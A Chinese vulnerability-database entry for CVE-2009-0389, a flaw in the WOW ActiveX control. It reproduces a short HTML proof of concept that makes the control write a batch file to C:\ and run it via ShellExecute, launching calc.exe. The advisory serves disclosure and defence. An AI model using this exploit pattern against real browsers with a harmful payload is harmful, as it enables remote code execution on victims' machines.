Eztools-Software Web on Windows ActiveX 'WriteIniFileString/ShellExecute'任意文件重写漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117317 漏洞类型 其他
发布时间 2009-01-29 更新时间 2009-02-04
CVE编号 CVE-2009-0389 CNNVD-ID CNNVD-200902-065
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7910
https://cxsecurity.com/issue/WLB-2009020090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-065
|漏洞详情
WOWActiveX2中的Windows(WOW)ActiveX控件上的web中存在多个不安全方法漏洞。远程攻击者可以(1)借助WriteIniFileString方法,创建和重写任意文件;(2)借助ShellExecute方法,允许任意程序;(3)借助未明向量,从登记簿中读取信息;(4)借助未明向量,写入数据到登记簿。注意:向量1和向量2一起被使用时,攻击者可以执行任意代码。
|漏洞EXP
Written By Michael Brooks
Special thanks to str0ke!

software:WOW - Web On Windows ActiveX Control 2  - Remote Code Execution
exploit type: Remote File Upload and Remote Code Execution
Download: http://www.download.com/WOW-Web-On-Windows-ActiveX-Control/3000-2206_4-10049976.html
183,682  downloads at the time of publishing this exploit.

This entire dll is full of bad functions,  including read write access
to the registry.
This must have been accidentally registered to IE's ActiveX interface.

<html>
<object classid="clsid:441E9D47-9F52-11D6-9672-0080C88B3613" id="obj">
	</object>
</html>
	<script>
	obj.WriteIniFileString("C:\\hack.bat","","calc.exe ","");
	obj.ShellExecute(0,"open","hack.bat",0,"C:\\",0);
</script>

# milw0rm.com [2009-01-29]
|参考资料

来源:XF
名称:wow-writeinifilestring-code-execution(48337)
链接:http://xforce.iss.net/xforce/xfdb/48337
来源:BID
名称:33515
链接:http://www.securityfocus.com/bid/33515
来源:MILW0RM
名称:7910
链接:http://www.milw0rm.com/exploits/7910